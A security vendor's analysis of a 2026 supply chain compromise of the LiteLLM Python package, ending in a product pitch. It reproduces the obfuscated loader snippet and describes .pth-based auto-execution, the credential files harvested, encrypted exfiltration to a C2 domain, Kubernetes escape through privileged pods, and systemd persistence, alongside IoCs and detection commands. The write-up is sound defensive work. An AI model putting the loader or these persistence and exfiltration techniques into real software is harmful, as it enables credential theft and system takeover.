LiteLLM Supply Chain Attack: How 12 Lines of Code Compromised 95 Million Downloads
On March 24, 2026, TeamPCP published two malicious versions of LiteLLM to PyPI. Within three hours, a credential-stealing payload reached AI infrastructure across 36% of monitored cloud environments.
This Is Not an AI Vulnerability
Before we dive in: this attack has nothing to do with LLM prompt injection, model jailbreaks, or AI safety. It's a software supply chain attack — the same class of threat that hit SolarWinds, Codecov, and ua-parser-js. The target just happens to be AI infrastructure. The vulnerability is in how packages are built, signed, and delivered — not in the models themselves.
What Is LiteLLM?
LiteLLM is a Python library that lets you call 100+ LLM APIs through a single interface. In proxy mode, it becomes a centralized AI gateway handling API keys, load balancing, and spend tracking. It's a transitive dependency in CrewAI, DSPy, MLflow, and LangChain — most teams don't know they run it. A library that handles every API key in your AI stack, installed 95M times per month. A perfect target.
How It Happened
TeamPCP didn't attack LiteLLM directly. Over the preceding month, they compromised two security scanners — Aqua Trivy and Checkmarx KICS — through misconfigured GitHub Actions, stealing CI/CD credentials at each step. Each compromise yielded tokens that unlocked the next target.
The final link: LiteLLM's CI pipeline ran apt-get install trivy — without pinning a version. It pulled the already-poisoned Trivy v0.69.4, which harvested the PYPI_PUBLISH token — the key to publishing Python packages under the LiteLLM name.
The Injection: Two Techniques in 13 Minutes
Version 1.82.7 (published 10:39 UTC) took the straightforward approach: 12 lines of obfuscated code injected into litellm/proxy/proxy_server.py at lines 128–139. The payload used double-base64 encoding — a ~4KB encoded string that decoded to a temp file and executed via subprocess.run(). It triggered whenever the proxy module was imported — which happens on every litellm --proxy start:
# Lines 128-139 of proxy_server.py (v1.82.7)
import subprocess, sys, base64, tempfile
_enc = "aW1wb3J0IH..." # double-base64 (~4KB decoded)
_dec = base64.b64decode(base64.b64decode(_enc))
with tempfile.NamedTemporaryFile(suffix='.py', delete=False) as f:
f.write(_dec); f.flush()
subprocess.run([sys.executable, f.name])
Version 1.82.8 (published 10:52 UTC — just 13 minutes later) escalated the attack. It kept the proxy_server.py injection but added a far more dangerous mechanism: a litellm_init.pth file included directly in the wheel package.
The .pth Mechanism: Why It's Devastating
Python's .pth files are normally used to extend sys.path, but any line starting with import is executed as code during interpreter initialization — before any user script runs. This means:
- The malware fires on any
pythoncommand — not just LiteLLM imports - It runs before
if __name__ == "__main__"— no way to guard against it - The file was correctly declared in the wheel's RECORD file, so
pip --require-hasheswould have passed — the hash was valid because the malicious content was published with legitimate credentials - It persists across virtualenv recreation — as long as the package is installed, the .pth executes
A critical bug: the .pth launcher spawned child processes via subprocess.Popen, which started new Python interpreters, which triggered the .pth again — creating an exponential fork bomb that crashed machines within seconds. This "bug in the malware" was likely the single biggest factor in accelerating detection, as affected systems became visibly unstable.
PyPI quarantined both versions at approximately 11:25 UTC — roughly three hours after the first publication. During that window, LiteLLM was averaging 3.4 million downloads per day.
The Payload
Click to expand each stage.
Credential Harvester
▶The first stage performed a comprehensive sweep of the host. It wasn't just reading files — it actively queried APIs to validate and expand the collected credentials:
- SSH —
id_rsa,id_ed25519,id_ecdsa,id_dsa,authorized_keys,config,known_hosts - AWS —
~/.aws/credentials,~/.aws/config, IMDSv2 metadata (169.254.169.254/latest/meta-data/iam/security-credentials/), ECS task role credentials via$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI - GCP — service account JSON files, application default credentials (
~/.config/gcloud/), compute metadata tokens - Azure — managed identity tokens via
169.254.169.254/metadata/identity/oauth2/token - Kubernetes —
~/.kube/config, in-cluster service account tokens at/var/run/secrets/kubernetes.io/, enumerated and dumped secrets across all accessible namespaces - CI/CD — Terraform state files (often contain cloud credentials in plaintext), GitLab CI tokens, Jenkins credentials.xml, Travis CI tokens,
.npmrc,.pypirc - Databases —
.pgpass,my.cnf, Redis/MongoDB connection strings - Crypto wallets — Bitcoin (
wallet.dat), Ethereum keystores, Solana keypairs - Application secrets — every
.envfile reachable from the user's home directory,.gitconfig, shell history (.bash_history,.zsh_history), Slack/Discord webhooks, Stripe API keys, SendGrid tokens
Encryption Pipeline
The exfiltration wasn't naive. Collected data was encrypted using a multi-layer scheme:
- Generate random AES-256-CBC session key + IV
- Derive key material using PBKDF2
- Encrypt the archive with the session key
- Encrypt the session key with a hardcoded 4096-bit RSA public key (only the attacker holds the private key)
- Package as
tpcp.tar.gzand POST tomodels.litellm[.]cloudwith headerX-Filename: tpcp.tar.gz
This means even if you captured the network traffic, you cannot decrypt the exfiltrated data without the attacker's RSA private key.
Kubernetes Lateral Movement
▶If Kubernetes service account tokens were found on the host, the malware escalated from credential theft to active cluster compromise:
- Read cluster secrets across all accessible namespaces via the K8s API
- Enumerated all nodes in the cluster
- For each node, deployed a privileged
alpine:latestpod namednode-setup-{node_name}in thekube-systemnamespace - The pod mounted the host root filesystem at
/viahostPathvolume - Inside the pod:
chroot /hostto escape the container, then installed the CanisterWorm backdoor directly on the node's filesystem
Container names alternated between kamikaze and provisioner — the former used for destructive operations, the latter for persistence.
For hosts with Tehran timezone or Farsi language settings, the behavior changed entirely: instead of persisting, the malware deployed a wiper that destroyed Kubernetes cluster data. This targeted destructive capability against Iranian infrastructure suggests geopolitical motivation beyond pure financial gain.
Persistent Backdoor
▶The final stage ensured long-term access through a systemd user service — requiring no root privileges:
- Wrote persistence script to
~/.config/sysmon/sysmon.py - Created systemd user unit at
~/.config/systemd/user/sysmon.service, labeled "System Telemetry Service" to blend in with legitimate monitoring - Initial 300-second sleep before first activation (evade sandbox analysis)
- Polled
checkmarx[.]zone/rawevery ~50 minutes for payload URLs - Downloaded payloads to
/tmp/pglog, executed in detached sessions viasetsid - Tracked beacon state in
/tmp/.pg_stateto avoid redundant downloads - Filtered YouTube links as a kill-switch — if the C2 returned a YouTube URL, the payload was skipped (allowing the attacker to "pause" operations)
This persistence survived reboots, pip uninstall litellm, and virtual environment recreation. The only remediation was finding and deleting the sysmon files manually, or rebuilding from a clean image.
When Sonatype researchers attempted to retrieve the C2 payload during analysis, the endpoint returned a link to an English remaster of "Bad Apple!!" — a deliberate troll that also defeated automated sandbox analysis.
Suppression & Impact
When security researchers filed GitHub issue #24512 reporting the compromise, TeamPCP used the stolen maintainer account to close it as "not planned" — making it appear the legitimate maintainers had dismissed the report. The issue was simultaneously flooded with bot comments from accounts matching botnets previously observed during the Trivy disclosure, burying legitimate analysis under noise.
The attack's C2 domain — models.litellm.cloud — was deliberately chosen to mimic legitimate LiteLLM infrastructure, making network-level detection harder for defenders scanning for suspicious domains.
Across the full campaign (Trivy → npm → KICS → LiteLLM), TeamPCP claimed to have "stolen hundreds of gigabytes of data and more than half a million accounts." Over 20,000 repositories were considered potentially vulnerable. LiteLLM itself was present in 36% of monitored cloud environments according to Wiz research.
IoCs & Forensics
| Type | Indicator | Context |
|---|---|---|
| PyPI | litellm==1.82.7 | proxy_server.py injection |
| PyPI | litellm==1.82.8 | + .pth persistence |
| SHA-256 Hashes | ||
| proxy_server.py | a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b | v1.82.7 |
| litellm_init.pth | 71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238 | v1.82.8 |
| sysmon.py | 6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a | Backdoor |
| Network | ||
| C2 | models.litellm[.]cloud | Exfiltration |
| C2 | checkmarx[.]zone | Backdoor polling |
| IP | 45.148.10.212 | aquasecurtiy[.]org |
| IP | 83.142.209.11 | checkmarx[.]zone |
| Filesystem & K8s | ||
| File | ~/.config/sysmon/sysmon.py | Persistence |
| Systemd | ~/.config/systemd/user/sysmon.service | User service |
| K8s | node-setup-{name} | kube-system pods |
| Archive | tpcp.tar.gz | Exfil bundle |
Detection & Remediation
If you installed LiteLLM between Mar 24 10:39–11:25 UTC → full credential exposure.
- Check version:
pip show litellm | grep Version - Find .pth:
find "$(python -c 'import site;print(site.getsitepackages()[0])')" -name "litellm_init.pth" - Check persistence:
ls ~/.config/sysmon/ ~/.config/systemd/user/sysmon.service - Audit K8s:
kubectl get pods -n kube-system | grep node-setup - Rotate ALL credentials from affected environment
- Rebuild from clean image — persistence survives pip uninstall
How Imunify for AI Agents Stops This
Once a package is installed, nothing inspects what it does at runtime. Imunify for AI Agents fills this gap with kernel-level interception — eBPF hooks, fanotify, transparent HTTP proxy.
The Kill Chain — Every Stage Blocked
Instant Discovery
When LiteLLM starts, a kernel-level sched_process_exec hook detects it instantly — PID tracked before the process runs its first instruction. No polling, no delay.
File Read Blocking
Every file LiteLLM opens is intercepted — the process is frozen in the kernel until policy decides. The compromised version's attempt to sweep credentials from .env, SSH keys, and cloud configs is denied on each read. A content scanner with 200+ secret patterns catches credentials even in unexpected file paths.
Network Correlation
Cross-event correlation rules catch the exact pattern this attack uses: if LiteLLM (or any tracked process) reads .env files and then attempts an outbound HTTP connection, the connection is automatically blocked — no human decision needed. Unknown destinations require explicit approval via Telegram, Discord, or Web UI before any data leaves the machine.
Behavioral Kill
When the compromised LiteLLM triggers a rapid burst of blocked file reads — the exact pattern of a credential harvester scanning the filesystem — Imunify for AI Agents automatically kills the process. No human intervention. The attack dies before it finishes its first sweep.
Conclusion
Supply chain attacks cascade. One misconfigured GitHub Action → credential theft → npm → KICS → PyPI. Incomplete remediation at each step left doors open.
Build-time security is necessary but insufficient. Signatures and hashes don't help when a compromised version is published with valid credentials. Runtime interception watches what code does, not where it came from.
Twelve lines. Three hours. Ninety-five million downloads. The next attack won't look like this one — but the syscalls will be the same.